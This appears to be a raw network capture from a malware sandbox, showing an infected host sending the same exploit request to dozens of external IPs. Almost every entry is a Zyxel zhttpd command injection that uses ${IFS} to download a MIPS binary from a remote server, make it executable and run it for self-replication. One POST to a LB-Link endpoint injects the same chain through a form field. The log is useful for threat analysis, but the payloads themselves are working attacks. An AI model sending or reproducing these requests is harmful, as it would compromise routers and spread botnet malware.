                                        Jan 14, 2024 16:18:55.712109089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7314192.168.2.1338694194.180.220.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712140083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7315192.168.2.135350641.221.223.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712173939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7316192.168.2.1347464161.252.53.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712207079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7317192.168.2.1346078192.73.245.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712250948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7318192.168.2.1345262116.170.247.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712266922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7319192.168.2.1354058116.188.47.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712311029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7320192.168.2.1337850147.218.142.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712347984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7321192.168.2.133853060.85.102.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712388992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7322192.168.2.1350386192.189.68.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712404966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7323192.168.2.1359440201.131.48.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712471962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7324192.168.2.133880463.115.152.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712503910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7325192.168.2.1347288115.69.90.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712553024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7326192.168.2.133326678.80.220.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712578058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7327192.168.2.1341804110.161.218.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712621927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7328192.168.2.133600451.7.238.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712658882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7329192.168.2.1358238148.252.242.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712706089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7330192.168.2.1347582156.159.219.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712747097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7331192.168.2.1339678118.129.152.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712791920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7332192.168.2.134870288.237.226.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712831974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7333192.168.2.1336802175.124.1.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.712882996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7334192.168.2.135587694.122.219.348080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.689111948 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7335192.168.2.1341470162.162.1.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.727909088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7336192.168.2.1351952211.236.107.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.727979898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7337192.168.2.135191693.90.106.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728018045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7338192.168.2.1341160173.84.33.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728089094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7339192.168.2.1348038180.173.117.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728146076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7340192.168.2.1341506193.245.48.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728180885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7341192.168.2.135485498.137.128.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728238106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7342192.168.2.1341594167.196.203.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728296995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7343192.168.2.1343930183.105.205.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728382111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7344192.168.2.1342358204.241.145.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728415012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7345192.168.2.1353368138.195.222.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728452921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7346192.168.2.1356914153.245.253.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728530884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7347192.168.2.1340232106.224.222.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728576899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7348192.168.2.135272841.236.204.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728609085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7349192.168.2.1344528213.206.164.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728682995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7350192.168.2.135735294.200.127.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728743076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7351192.168.2.1347230157.77.139.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728790998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7352192.168.2.1356060197.153.128.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728831053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7353192.168.2.1334702134.133.96.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.728998899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7354192.168.2.135885073.237.202.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729072094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7355192.168.2.1353226119.194.180.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729118109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7356192.168.2.134763479.17.98.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729176998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7357192.168.2.1349224218.113.170.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729238033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7358192.168.2.133774890.222.35.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729309082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7359192.168.2.1352080167.73.43.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729343891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7360192.168.2.1339870222.225.151.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729415894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7361192.168.2.1343484151.114.100.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729465961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7362192.168.2.134051073.99.157.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729532957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7363192.168.2.1345570134.210.177.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729602098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7364192.168.2.1347086126.44.219.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729671955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7365192.168.2.1358748109.239.91.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729711056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7366192.168.2.1349842218.154.128.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729778051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7367192.168.2.1343084179.1.219.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729831934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7368192.168.2.1335012207.219.40.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729923010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7369192.168.2.134921880.63.156.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.729959965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7370192.168.2.1340246144.34.209.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730034113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7371192.168.2.134805825.196.84.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730103016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7372192.168.2.1345416220.240.63.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730169058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7373192.168.2.134920640.180.234.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730199099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7374192.168.2.1334458200.226.87.67443
                                        TimestampBytes transferredDirectionData
